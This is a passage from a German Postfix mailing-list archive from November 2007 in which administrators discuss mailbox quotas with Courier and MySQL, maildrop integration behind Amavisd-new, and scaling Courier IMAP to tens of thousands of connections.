kann ohne das dieser für jede Clientconnection eine Verbindung zum eigentlichen IMAP Server offen hält oder etwas anderes um dem bekannten Problem entgegen zu wirken. Viele Grüße, Oliver p.s. das neue, langersehnte Pop3 und Imap Buch ist gut geworden ;-) From postfixbuch at thomas-schwenski.de Tue Nov 20 18:31:29 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Tue, 20 Nov 2007 18:31:29 +0100 Subject: [Postfixbuch-users] Postfix / Courier softqouta mysql In-Reply-To: <4742BEFD.4060405@thoma.cc> References: <4742BEFD.4060405@thoma.cc> Message-ID: <474319F1.1090203@thomas-schwenski.de> Hallo Maximillian, IMHO beherrscht Postfix bis jetzt keine Quota ohne Patch. Ehe Du jetzt an's Selbstkompilieren gehst, habe ich eine "einfachere" Idee. Man nehme einen Policy-Daemon der genau diese Aufgabe übernimmt und erspare sich damit den ganzen Kompilier-Ärger. (Naja eher Aufwand, als Ärger.) Zwei Probleme gibt's dabei. Den Daemon musst Du Dir selber schreiben und sinnvollerweise 2-mal in die Postfix-Konfiguration einbinden. Einmal in den smtpd_recipient_restrictions[1] und einmal in den smtpd_end_of_data_restrictions[2]. Warum zweimal? Die Größe einer E-Mail steht zu zwei Zeitpunkten fest: Theorethisch einmal, wenn der Absender mit dem MAIL FROM die Größe der E-Mail angibt. Zu diesem Zeitpunkt sind dem empfangenden Mailserver aber noch nicht die Empfänger und damit die Postfachgrößenbeschränkungen bekannt. Diese sind erst nach dem RCPT TO bekannt. Daher einmal die Einbindung in den smtpd_recpient_restrictions um die Annahme zu großer Mails an EINZELNE Empfänger zu verweigern. (Empfänger mit ausreichend Platz in der Mailbox erhalten die E-Mail weiterhin.) Die Angabe über die Mailgröße ist zu diesem Zeitpunkt aber nicht verlässlich, denn schließlich kann der sendende Mailserver ja alles mögliche angeben. Verlässlich ist aber die Größe, die der empfangende Mailserver ermittelt, sobald die E-Mail komplett übertragen wurde. Das ist in den smtpd_end_of_data_restrictions der Fall. Allerdings würde an dieser Stelle eine Ablehnung der E-Mail auf Grund der Postfachspeicherbegrenzung eines einzelnen Empfängers bedeuten, dass die E-Mail-Annahme für ALLE Empfänger verweigert wird. (Was vielleicht nicht ganz so schlimm ist.) Warum sollte der Policy-Daemon zweimal eingebunden werden, wenn es egal ist, ob die Mail für alle Empfänger abgewiesen wird? Ganz einfach: wenn der Daemon nur in den smtpd_end_of_data_restrictions eingebunden ist, bedeutet das nicht nur den Wegfall eines Features, sondern zu diesem Zeitpunkt wurde die E-Mail bereits komplett übertragen und hat bereits Traffic verursacht und Rechnerressourcen verbraucht. Warum sollte die E-Mail auf Grund einer nicht verlässlichen Angabe geblockt werden? Gegenfrage: Welchen Sinn hat es, dass ein absendender Mailserver einen höheren als den tatsächlichen Wert übermittelt? Und wenn er es macht, ist das dann das Problem des Empfängers? Allerdings solltest Du etwas beachten und nicht einfach die Quota-Size von Courier übernehmen: Viele setzen einen Content-Filter (z.B. Amavisd-new) ein. D.h. es können noch Mails in Bearbeitung (auch in der Postfix-Mailqueue) und noch nicht im Maildir abgelegt sein. Würdest Du die Quota einfach übernehmen heißt das, dass die erste smtpd-Instanz die E-Mail annimmt und (je nach Konfiguration) die smtpd-Instanz nach dem Content-Filter oder Courier verweigert die Annahme der E-Mail. Damit bleibt die Mail entweder in der Postfix-Mailqueue oder dein Server ist für das Versenden der DSN verantwortlich. Und beides gilt es zu vermeiden. D.h. Du musst einen ausreichend großen Puffer einkalkulieren. Besonders die Problematik beim Einsatz eines Content-Filters dürfte so oder ähnlich auch bei Verwendung des Patches bestehen. Das Ganze funktioniert erst ab Postfix 2.2[3] Das sind die Gedanken, die ich mir bis jetzt zum Thema gemacht habe. Leider fehlte mir bisher immer die Zeit einen solchen Daemon zu programmieren. Sonst wäre das schon lange geschehen. Vielleicht hat noch einer der Experten von der Liste noch einen Hinweis, was ich eventuell nicht weiß, nicht berücksichtigt habe oder übersehe. Gruß Thomas [1] http://www.postfix.org/postconf.5.html#smtpd_recipient_restrictions [2] http://www.postfix.org/postconf.5.html#smtpd_end_of_data_restrictions [3] http://www.postfix.org/SMTPD_POLICY_README.html Maximilian Thoma schrieb: > Hallo Liste, > > ich wollte meine Konfiguration um Quota erweitern und habe folgende > Parameter hinzugefügt: > > virtual_mailbox_limit_maps = proxy:mysql:/etc/postfix/mysql-v_quota.cf > virtual_mailbox_limit_override = yes > virtual_maildir_limit_message = Sorry, the user's maildir has overdrawn > his diskspace quota, please try again later. > virtual_overquota_bounce = yes > > Leider nimmt er dann immer noch Mails an obwohl er über dem Quota ist. > > Die Abfrage ist erfolgreich: > mxadm at server ~$ sudo postmap -q quota at thoma.cc > mysql:/etc/postfix/mysql-v_quota.cf > 10240 > > Ich habe ein wenig im Netz rumgesucht und bin darauf gekommen das man > für die Quota Funktion einen Patch installieren muss. > > Hat das jemand von euch schon gemacht? > Ist das ein Problem bei einem laufendem System? > Geht es auch irgendwie ohne den Patch? > > Die Hinweise die ich gefunden haben betreffen Debian Sarge. > Ist im Debian Etch dieser Patch schon mit drin? > > > Howto: http://www.howtoforge.com/virtual_postfix_mysql_quota_courier > >>>>> Schnipp >>>> > 2 Apply Quota Patch To Postfix > > We have to get the Postfix sources, patch it with the quota patch, build > new Postfix .deb packages and install those .deb packages: > > apt-get install build-essential dpkg-dev fakeroot debhelper libdb4.2-dev > libgdbm-dev libldap2-dev libpcre3-dev libmysqlclient10-dev libssl-dev > libsasl2-dev postgresql-dev po-debconf dpatch (1 line!) > cd /usr/src > apt-get source postfix > wget http://web.onda.com.br/nadal/postfix/VDA/postfix-2.1.5-trash.patch.gz > gunzip postfix-2.1.5-trash.patch.gz > cd postfix-2.1.5 > patch -p1 < ../postfix-2.1.5-trash.patch > dpkg-buildpackage > cd .. > dpkg -i postfix_2.1.5-9_i386.deb > dpkg -i postfix-mysql_2.1.5-9_i386.deb > dpkg -i postfix-tls_2.1.5-9_i386.deb > <<<<< Schnapp <<<<<<< > > > Danke schon mal im voraus. > > Gruß > > > Maximilian > > > From postfixbuch at thomas-schwenski.de Tue Nov 20 18:32:13 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Tue, 20 Nov 2007 18:32:13 +0100 Subject: [Postfixbuch-users] maildrop als MDA in Postfix->Amavisd-New->Postfix->Courier-Konfiguration In-Reply-To: <47400F30.9050307@thomas-schwenski.de> References: <47400F30.9050307@thomas-schwenski.de> Message-ID: <47431A1D.2030005@thomas-schwenski.de> Nutzt hier niemand maildrop?? Thomas Schwenski schrieb: > Hallo, > > ich möchte meinen Server so umgestalten, dass Spam-Mails automatisch in > einen bestimmten Ordner sortiert werden. > > Da ich Courier als IMAP-Server verwende liegt die Lösung in maildrop. > Eingebunden werden muss maildrop per > > virtual_transport = maildrop > > in der /etc/postfix/main.cf > und per > > maildrop unix - n n - - pipe > flags=DROhq user=mail argv=/usr/bin/maildrop -d ${recipient} > > in der /etc/postfix/master.cf . > > Da bei mir noch amavisd-new als Content-Filter arbeitet wäre es wohl > sinnvoller den virtual_mailbox-Parameter in der /etc/postfix/master.cf > für den zweiten smtpd anzugeben, oder? > > Außerdem habe ich noch den Hinweis gefunden, dass maildrop > E-Mail-Verzeichnisse nicht automatisch anlegt und man daher mit > folgenden Zeilen in der /etc/courier/maildroprc arbeiten sollte um diese > Funktion wieder zu bekommen: > > MAILDIR = "$DEFAULT" > `test -d "$MAILDIR"` # check if dir exist > > if ($RETURNCODE != 0) > { > `mkdir -p $MAILDIR` # create dirs with parents > `rmdir $MAILDIR` # remove dir for init > `maildirmake $MAILDIR` # create maildir > } > > > Nach Studie von man mkdir, bin ich mir allerdings nicht sicher ob der > der Parameter -p die entsprechenden Benutzerrechte aus meinem > Virtual-Users-Backend (MySQL) berücksichtigt bzw. ob maildirmake da macht. > (Bei mir hat jeder "Kunde" (NICHT jeder E-Mail-User) einen eigenen > Systembenutzer um die Zugriffsrechte optimal voneinander abzugrenzen.) > > Weiterhin möchte ich jedem E-Mail-Nutzer die Möglichkeit geben eigene > Regeln zu verwenden. > Laut der Dokumentation von maildrop müssen dazu die Filterregeln in > $HOME/.mailfilter abgelegt werden. > > Kann ich nun einfach bei den betreffenden E-Mail-Nutzern diese Datei in > ihr Maildir legen und den $HOME-Eintrag in /etc/courier/authmysqlrc > entsprechend auf das Maildir legen, oder wertet maildrop diese > Konfiguration nicht aus? > > Ich möchte das gerne abgeklärt haben, ehe ich das an einem laufenden > Server implementiere. > > > Gruß & schönen Sonntag > Thomas From postfixbuch at thomas-schwenski.de Tue Nov 20 18:59:58 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Tue, 20 Nov 2007 18:59:58 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <474311A9.5020600@puersten.de> References: <474311A9.5020600@puersten.de> Message-ID: <4743209E.40902@thomas-schwenski.de> > Hi Peer, > > ich bin bei meiner Suche nach der Lösung für ein ähnliches Problem auf diese interessante > Unterhaltung gestoßen. > > Jetzt wollte ich mal fragen ob Du oder jemand anders hier schon eine Lösung gefunden hat? > Sprich einen IMAP Proxy welchen man vorschalten kann ohne das dieser für jede > Clientconnection eine Verbindung zum eigentlichen IMAP Server offen hält oder etwas anderes > um dem bekannten Problem entgegen zu wirken. > > Viele Grüße, > Oliver > > p.s. das neue, langersehnte Pop3 und Imap Buch ist gut geworden ;-) Muss es denn ein IMAP-Proxy sein? Wie wäre denn mit einem DNS-Loadbalancer? Wenn der gesamte Cluster auf denselben Datenspeicher zugreift dürfte das letztendlich doch egal sein. Und damit es nur die trifft, die es treffen soll, wird nur imap.example.net "ge-loadbalance-d". Nur so als Idee. Thomas From postfixusers at home.tom-krieger.de Tue Nov 20 19:03:20 2007 From: postfixusers at home.tom-krieger.de (Thomas Krieger) Date: Tue, 20 Nov 2007 19:03:20 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?maildrop_als_MDA_in=09Postfix-?= =?iso-8859-1?q?_=3EAmavisd-New-=3EPostfix-=3ECourier-Konfiguration?= In-Reply-To: <47431A1D.2030005@thomas-schwenski.de> References: <47400F30.9050307@thomas-schwenski.de> <47431A1D.2030005@thomas-schwenski.de> Message-ID: <200711201903.21780.postfixusers@home.tom-krieger.de> Am Di November 20 2007 schrieb Thomas Schwenski: > Nutzt hier niemand maildrop?? Ja. Ich lasse vom Anwender selbst per Webinterface generierte Filterregeln zu. Gleichzeitig kann der Anwender bestimmen, ob er Spamassassin verwendet und wie er ihn konfiguriert (Whitelist, Mailgöße). Im anwenderspezifischen .mailfilter File steht dann folgendes: # spamassassin if( $SIZE <= 51200 ) { xfilter "/usr/bin/spamc -u @" } if( /^X-Spam-Flag:.*YES/ ) { to "$MAILDIR/.Spam" } HTH. Servus Thomas > > Thomas Schwenski schrieb: > > Hallo, > > > > ich möchte meinen Server so umgestalten, dass Spam-Mails automatisch in > > einen bestimmten Ordner sortiert werden. > > > > Da ich Courier als IMAP-Server verwende liegt die Lösung in maildrop. > > Eingebunden werden muss maildrop per > > > > virtual_transport = maildrop > > > > in der /etc/postfix/main.cf > > und per > > > > maildrop unix - n n - - pipe > > flags=DROhq user=mail argv=/usr/bin/maildrop -d ${recipient} > > > > in der /etc/postfix/master.cf . > > > > Da bei mir noch amavisd-new als Content-Filter arbeitet wäre es wohl > > sinnvoller den virtual_mailbox-Parameter in der /etc/postfix/master.cf > > für den zweiten smtpd anzugeben, oder? > > > > Außerdem habe ich noch den Hinweis gefunden, dass maildrop > > E-Mail-Verzeichnisse nicht automatisch anlegt und man daher mit > > folgenden Zeilen in der /etc/courier/maildroprc arbeiten sollte um diese > > Funktion wieder zu bekommen: > > > > MAILDIR = "$DEFAULT" > > `test -d "$MAILDIR"` # check if dir exist > > > > if ($RETURNCODE != 0) > > { > > `mkdir -p $MAILDIR` # create dirs with parents > > `rmdir $MAILDIR` # remove dir for init > > `maildirmake $MAILDIR` # create maildir > > } > > > > > > Nach Studie von man mkdir, bin ich mir allerdings nicht sicher ob der > > der Parameter -p die entsprechenden Benutzerrechte aus meinem > > Virtual-Users-Backend (MySQL) berücksichtigt bzw. ob maildirmake da > > macht. (Bei mir hat jeder "Kunde" (NICHT jeder E-Mail-User) einen eigenen > > Systembenutzer um die Zugriffsrechte optimal voneinander abzugrenzen.) > > > > Weiterhin möchte ich jedem E-Mail-Nutzer die Möglichkeit geben eigene > > Regeln zu verwenden. > > Laut der Dokumentation von maildrop müssen dazu die Filterregeln in > > $HOME/.mailfilter abgelegt werden. > > > > Kann ich nun einfach bei den betreffenden E-Mail-Nutzern diese Datei in > > ihr Maildir legen und den $HOME-Eintrag in /etc/courier/authmysqlrc > > entsprechend auf das Maildir legen, oder wertet maildrop diese > > Konfiguration nicht aus? > > > > Ich möchte das gerne abgeklärt haben, ehe ich das an einem laufenden > > Server implementiere. > > > > > > Gruß & schönen Sonntag > > Thomas -- Microsoft is a cross between the Borg and the Ferengi. Unfortunately, they use Borg to do their marketing and Ferengi to do their programming. -- Simon Slavin From nighthawk at gmail.com Tue Nov 20 19:17:23 2007 From: nighthawk at gmail.com (nighthawk) Date: Tue, 20 Nov 2007 19:17:23 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <4743209E.40902@thomas-schwenski.de> References: <474311A9.5020600@puersten.de> <4743209E.40902@thomas-schwenski.de> Message-ID: <7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com> On Nov 20, 2007 6:59 PM, Thomas Schwenski wrote: > Muss es denn ein IMAP-Proxy sein? > > Wie wäre denn mit einem DNS-Loadbalancer? > Wenn der gesamte Cluster auf denselben Datenspeicher zugreift dürfte das > letztendlich doch egal sein. > Und damit es nur die trifft, die es treffen soll, wird nur > imap.example.net "ge-loadbalance-d". > > Nur so als Idee. Ich denke das bringt nicht den gesuchten Effekt. Connections kann man immer irgendwie verteilen, das Problem ist aber, daß er nur 6.000 User auf eine Kiste bekommt, d.h. 25 Server benötigt. Auch beim intelligentesten Loadbalancing. From postfixbuch at thomas-schwenski.de Tue Nov 20 20:07:57 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Tue, 20 Nov 2007 20:07:57 +0100 Subject: [Postfixbuch-users] maildrop als MDA in Postfix- >Amavisd-New->Postfix->Courier-Konfiguration In-Reply-To: <200711201903.21780.postfixusers@home.tom-krieger.de> References: <47400F30.9050307@thomas-schwenski.de> <47431A1D.2030005@thomas-schwenski.de> <200711201903.21780.postfixusers@home.tom-krieger.de> Message-ID: <4743308D.1060805@thomas-schwenski.de> Hallo Thomas, wie hast Du die Einbindung in Postfix realisiert? (Siehe mein Full-Quote.) Ich vermute, Du hast kein Amavis laufen?? Meine Konfiguration ist wie gesagt Postfix->Amavis->Postfix und ich muss die Einbindung von maildrop leider auf einem Produktiv-System mit minimaler Ausfallzeit realisieren. Daher muss ich mich auf alle möglichen "Ausfälle" vorbereiten. Thomas Thomas Krieger schrieb: > Am Di November 20 2007 schrieb Thomas Schwenski: >> Nutzt hier niemand maildrop?? > > Ja. Ich lasse vom Anwender selbst per Webinterface generierte Filterregeln zu. > Gleichzeitig kann der Anwender bestimmen, ob er Spamassassin verwendet und > wie er ihn konfiguriert (Whitelist, Mailgöße). > > Im anwenderspezifischen .mailfilter File steht dann folgendes: > > # spamassassin > if( $SIZE <= 51200 ) > { > xfilter "/usr/bin/spamc -u @" > } > > if( /^X-Spam-Flag:.*YES/ ) > { > to "$MAILDIR/.Spam" > } > > HTH. > > Servus > > Thomas > >> Thomas Schwenski schrieb: >>> Hallo, >>> >>> ich möchte meinen Server so umgestalten, dass Spam-Mails automatisch in >>> einen bestimmten Ordner sortiert werden. >>> >>> Da ich Courier als IMAP-Server verwende liegt die Lösung in maildrop. >>> Eingebunden werden muss maildrop per >>> >>> virtual_transport = maildrop >>> >>> in der /etc/postfix/main.cf >>> und per >>> >>> maildrop unix - n n - - pipe >>> flags=DROhq user=mail argv=/usr/bin/maildrop -d ${recipient} >>> >>> in der /etc/postfix/master.cf . >>> >>> Da bei mir noch amavisd-new als Content-Filter arbeitet wäre es wohl >>> sinnvoller den virtual_mailbox-Parameter in der /etc/postfix/master.cf >>> für den zweiten smtpd anzugeben, oder? >>> >>> Außerdem habe ich noch den Hinweis gefunden, dass maildrop >>> E-Mail-Verzeichnisse nicht automatisch anlegt und man daher mit >>> folgenden Zeilen in der /etc/courier/maildroprc arbeiten sollte um diese >>> Funktion wieder zu bekommen: >>> >>> MAILDIR = "$DEFAULT" >>> `test -d "$MAILDIR"` # check if dir exist >>> >>> if ($RETURNCODE != 0) >>> { >>> `mkdir -p $MAILDIR` # create dirs with parents >>> `rmdir $MAILDIR` # remove dir for init >>> `maildirmake $MAILDIR` # create maildir >>> } >>> >>> >>> Nach Studie von man mkdir, bin ich mir allerdings nicht sicher ob der >>> der Parameter -p die entsprechenden Benutzerrechte aus meinem >>> Virtual-Users-Backend (MySQL) berücksichtigt bzw. ob maildirmake da >>> macht. (Bei mir hat jeder "Kunde" (NICHT jeder E-Mail-User) einen eigenen >>> Systembenutzer um die Zugriffsrechte optimal voneinander abzugrenzen.) >>> >>> Weiterhin möchte ich jedem E-Mail-Nutzer die Möglichkeit geben eigene >>> Regeln zu verwenden. >>> Laut der Dokumentation von maildrop müssen dazu die Filterregeln in >>> $HOME/.mailfilter abgelegt werden. >>> >>> Kann ich nun einfach bei den betreffenden E-Mail-Nutzern diese Datei in >>> ihr Maildir legen und den $HOME-Eintrag in /etc/courier/authmysqlrc >>> entsprechend auf das Maildir legen, oder wertet maildrop diese >>> Konfiguration nicht aus? >>> >>> Ich möchte das gerne abgeklärt haben, ehe ich das an einem laufenden >>> Server implementiere. >>> >>> >>> Gruß & schönen Sonntag >>> Thomas > > > From postfixbuch at thomas-schwenski.de Tue Nov 20 20:20:28 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Tue, 20 Nov 2007 20:20:28 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com> References: <474311A9.5020600@puersten.de> <4743209E.40902@thomas-schwenski.de> <7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com> Message-ID: <4743337C.3010700@thomas-schwenski.de> nighthawk schrieb: > On Nov 20, 2007 6:59 PM, Thomas Schwenski > wrote: > >> Muss es denn ein IMAP-Proxy sein? >> >> Wie wäre denn mit einem DNS-Loadbalancer? >> Wenn der gesamte Cluster auf denselben Datenspeicher zugreift dürfte das >> letztendlich doch egal sein. >> Und damit es nur die trifft, die es treffen soll, wird nur >> imap.example.net "ge-loadbalance-d". >> >> Nur so als Idee. > > Ich denke das bringt nicht den gesuchten Effekt. Connections kann man > immer irgendwie verteilen, das Problem ist aber, daß er nur 6.000 User > auf eine Kiste bekommt, d.h. 25 Server benötigt. Auch beim > intelligentesten Loadbalancing. Du vermischst gerade 3 Dinge: 1. Oliver sucht etwas ähnliches wie Peer _irgendwann_mal_ suchte. 2. Peer hatte das wohl unlösbare Problem, dass Courier-Imap 1MB pro Sitzung verbrät. (Da dran lässt sich wohl auch nicht weiter rütteln, ausser es ändert sich, sofern überhaupt möglich, etwas an der Courier-Implementation.) 3. Peer suchte eine Möglichkeit für E-Mail-Nutzer "unsichtbar" die Zugriffe zu im Cluster auf die einzelnen Server zu verteilen. Die dafür nötige Software (IMAP-Proxy) sollte möglichst wenig Speicher benötigen, oder/und benötigten Speicher umgehend wieder freigeben. Und genau da sind wir beim Thema DNS-Loadbalancer: Denn der verbraucht kaum Speicher und das unabhängig von der Anzahl der Verbindungen. Denn die tatsächliche IMAP-Sitzung interessiert den DNS-Loadbalancer nicht mehr. Was spricht also dagegen? Andererseits sollte mal folgende Überlegung angestellt werden: Bei Peers Vorhaben sollten 300.000 E-Mail-User bedient werden. Wenn man mal von Kosten von 1 Euro pro Postfach und Monat ausgeht, dann sind da schon im ersten Monat locker die Kosten für ca. 40 Server (25 IMAP, 10 POP3, 2 DNS-Loadbalancer, 3 Reserve) drin, oder? Es wäre natürlich interessant zu erfahren, wofür bzw. für wen Peer so viele E-Mail-User bedienen können wollte/sollte und wie es nun ausging. Peer? Thomas From nighthawk at gmail.com Tue Nov 20 20:33:41 2007 From: nighthawk at gmail.com (nighthawk) Date: Tue, 20 Nov 2007 20:33:41 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <4743337C.3010700@thomas-schwenski.de> References: <474311A9.5020600@puersten.de> <4743209E.40902@thomas-schwenski.de> <7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com> <4743337C.3010700@thomas-schwenski.de> Message-ID: <7832fd560711201133p16af0ca5vb26ae579b69417f7@mail.gmail.com> On Nov 20, 2007 8:20 PM, Thomas Schwenski wrote: > 3. Peer suchte eine Möglichkeit für E-Mail-Nutzer "unsichtbar" die > Zugriffe zu im Cluster auf die einzelnen Server zu verteilen. > Die dafür nötige Software (IMAP-Proxy) sollte möglichst wenig Speicher > benötigen, oder/und benötigten Speicher umgehend wieder freigeben. Jein! Der Proxy sollte natürlich (erheblich) weniger als 1MB pro Vebindung verbrauchen und - hier kommt das wichtige - die Verbindung zu Courier bei Nichtnutzung abbauen! Denn ansonsten bringt der ganze Proxy ja nichts, wenn Courier trotzdem noch die selbe Verbindungsanzahl zu tragen hat. > Und genau da sind wir beim Thema DNS-Loadbalancer: > Denn der verbraucht kaum Speicher und das unabhängig von der Anzahl der > Verbindungen. Denn die tatsächliche IMAP-Sitzung interessiert den > DNS-Loadbalancer nicht mehr. > > Was spricht also dagegen? Genau eines: Die Verbindung wird bei Nichtnutzung nicht abgebaut. From p.heinlein at heinlein-support.de Tue Nov 20 22:07:09 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Tue, 20 Nov 2007 22:07:09 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <474311A9.5020600@puersten.de> References: <474311A9.5020600@puersten.de> Message-ID: <200711202207.09600.p.heinlein@heinlein-support.de> Am Dienstag, 20. November 2007 schrieb Oliver Pürsten: > Jetzt wollte ich mal fragen ob Du oder jemand anders hier schon eine > Lösung gefunden hat? Sprich einen IMAP Proxy welchen man vorschalten > kann ohne das dieser für jede Clientconnection eine Verbindung zum > eigentlichen IMAP Server offen hält oder etwas anderes um dem bekannten > Problem entgegen zu wirken. Wir hatten damals angeboten, diesen Proxy zu programmieren und hatten auch ein spezielles Konzept dazu. Der Programmieraufwand wäre nicht allzu immens gewesen, da nur ein Bruchteil des IMAP-Protokolls implementiert werden müßte. Das meine Idee funktioniert habe ich mich auch verifiziert und dazu das Okay von jemandem bekommen, der einen Mailcluster für ein paar Millionen (POP3)-Kunden programmiert hat und der auch an der Programmierung dieses Proxies mitwirken würde (als bezahlter Auftrag). Ja, es würde funktionieren und die eingesparte Hardware holt die Programmierkosten schnell wieder raus. Leider hat der Auftraggeber sich damals lieber dafür entschieden, das vierfache an Geld in Blades zu stecken. Das "warum" sollte man besser nicht diskutieren. Das Konzept steht aber nach wie vor und wir wirken hier gerne an der Implementierung mit. Aktuell habe ich gerade wieder einen 100.000 User-Cluster, wo wir diesen Spezial-Proxy ggf. auch einsetzen könnten. Eingeplant ist er derzeit aber dort noch nicht. Angesichts der Tatsache, daß ein 8-Prozessorsystem mit 32 Gbyte RAM für nicht wirklich viel Geld zu kriegen ist (13.000 EUR) und auch 64 GByte RAM möglich sind, skalieren solchen Szenarien in der Hardware natürlich auf einmal deutlich charmanter. Wenn hier interesse besteht -- ich habe ein Telefon. 030/405051-0. > p.s. das neue, langersehnte Pop3 und Imap Buch ist gut geworden ;-) Danke, freut uns. Du kannst sicher sein, daß es auch eine echte Erleichterung war, als es endlich fertig war. Lieben Gruß Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From p.heinlein at heinlein-support.de Tue Nov 20 22:14:01 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Tue, 20 Nov 2007 22:14:01 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <4743337C.3010700@thomas-schwenski.de> References: <474311A9.5020600@puersten.de> <7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com> <4743337C.3010700@thomas-schwenski.de> Message-ID: <200711202214.01617.p.heinlein@heinlein-support.de> Am Dienstag, 20. November 2007 schrieb Thomas Schwenski: > 1. Oliver sucht etwas ähnliches wie Peer _irgendwann_mal_ suchte. Wie Peer nach wie vor ständig baut und eigentlich immernoch einen Auftraggeber sucht, der sowas lieber intelligent als durch Hardware löst. :-) > 2. Peer hatte das wohl unlösbare Problem, dass Courier-Imap 1MB pro > Sitzung verbrät. (Da dran lässt sich wohl auch nicht weiter rütteln, > ausser es ändert sich, sofern überhaupt möglich, etwas an der > Courier-Implementation.) Es ist lösbar, dazu ja dieser Spezial-Proxy. Sozusagen exakt das Gegenteil von up-imapproxy, der solche Verbindungen offenhält. :-) > Und genau da sind wir beim Thema DNS-Loadbalancer: > Denn der verbraucht kaum Speicher und das unabhängig von der Anzahl der > Verbindungen. Denn die tatsächliche IMAP-Sitzung interessiert den > DNS-Loadbalancer nicht mehr. > > Was spricht also dagegen? Daß es nicht darum geht, Zugriffe auf die Server zu verteilen. DAS ist banal. Egal welche Form von Loadbalancer -- das ist nicht der Akt. Das Problem ist, daß 80.000 User nach wie vor 80.000 IMAP-Sitzungen offen halten. Egal wie Du es auf die Server verteilst -- der RAM-Verbrauch ist da. Das von mir skiziierte Proxy-System würde den RAM-Verbrauch an sich drastisch minimieren, so daß brutal Hardware eingespart werden kann. Mit der Verteilung auf die Nodes hat das wenig zu tun. Loadbalancer brauchst Du in der Größenordnung zur Sicherstellung der HA sowieso. > Bei Peers Vorhaben sollten 300.000 E-Mail-User bedient werden. > Wenn man mal von Kosten von 1 Euro pro Postfach und Monat ausgeht, dann > sind da schon im ersten Monat locker die Kosten für ca. 40 Server (25 > IMAP, 10 POP3, 2 DNS-Loadbalancer, 3 Reserve) drin, oder? Tja, man kann auch 15 Server einsetzen und damit zwei flotte BMW sparen (oder einfach mal zur Abwechslung jemanden einstellen, anstatt das Geld in Fernost-Hardware zu stecken). Zu bedenken ist auch: Sowas wächst. Aus 40 Servern werden 80. Und dann dann würden aus 15 nur 30 werden. Man solte ja auch an die Zukunft denken. Und Server brauchen Strom. Und Kühlung. Und Ersatzteile. 50 Server Unterschied sind hier auf 5 Jahre eine RIESIGE Menge Unterschied. Achwas, das sind mehr als zwei BMW oder nur eine Admin-Stelle. > Es wäre natürlich interessant zu erfahren, wofür bzw. für wen Peer so > viele E-Mail-User bedienen können wollte/sollte und wie es nun ausging. > > Peer? Den Auftraggeber kann ich nicht nennen. Weder das damalige, noch das aktuelle Projekt. Ausgegangen ist es dahin, daß damals die Entscheidung in Hardware fiel, beim aktuellen Projekt ist das noch nicht thematisiert. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From postfixusers at home.tom-krieger.de Tue Nov 20 23:19:28 2007 From: postfixusers at home.tom-krieger.de (Thomas Krieger) Date: Tue, 20 Nov 2007 23:19:28 +0100 Subject: [Postfixbuch-users] maildrop als MDA in Postfix- >Amavisd-New->Postfix->Courier-Konfiguration In-Reply-To: <4743308D.1060805@thomas-schwenski.de> References: <47400F30.9050307@thomas-schwenski.de> <200711201903.21780.postfixusers@home.tom-krieger.de> <4743308D.1060805@thomas-schwenski.de> Message-ID: <200711202319.30226.postfixusers@home.tom-krieger.de> Hallo Thomas, > > wie hast Du die Einbindung in Postfix realisiert? > (Siehe mein Full-Quote.) > > Ich vermute, Du hast kein Amavis laufen?? Doch habe ich. > Meine Konfiguration ist wie gesagt Postfix->Amavis->Postfix und ich muss > die Einbindung von maildrop leider auf einem Produktiv-System mit > minimaler Ausfallzeit realisieren. Die Konfig ist genauso: Postfix -> Amavis -> Postfix -> maildrop oder uucp Ich habe in der master.cf folgendes zu maildrop drin: maildrop unix - n n - - pipe flags=RDO user=vmail argv=/usr/local/bin/maildrop -w 85 -d ${user}@${nexthop} ${extension} ${recipient} ${user} ${nexthop} ${sender} Ich verwende im Postfix eine MySQL Datenbank die über eine Tabelle zur Domain den Transport festlegt. maildrop habe ich selber kompiliert, weil auf meinem System keine MySQL Unterstützung im Paket einkompiliert war. Bei maildrop verwende ich die globale /etc/maildroprc dazu, das Postfach, wenn noch nicht vorhanden, im Filesystem anzulegen und einzurichten und wenn vom Anwender zwingend benötigte Ordner gelöscht wurden, diese wieder herzustellen. Anschließend wird die postfachspezifische .mailfilter Datei per include verarbeitet. Diese liegt nicht im $HOME! Bei mir haben die Benutzer keinen direkten Zugriff auf den Server, ein Login per Shell ist nicht möglich. Ich lasse nur Zugriffe über IMAP(s), POP3(s), SMTP(s) und http(s) zu. Zur Konfiguration der Maildrop Regeln gibt es ein Webinterface, dass die Regeln in eine MySQL schreibt und dann die Generierung der benutzerspezifischen .mailfilter Datei veranlasst. > Daher muss ich mich auf alle möglichen "Ausfälle" vorbereiten. Was genau als Ausfall passieren kann, weiß ich auch nicht. Allerdings würde ich mir eine nicht zu knappe Downtime gönnen, damit Du Luft hast, wenn Unvorhergesehenes passiert. Ein Testsystem wäre natürlich noch besser. Ich denke aber, Du kannst maildrop bevor Du es einbindest sicher über die Commandline testen. Servus Thomas From 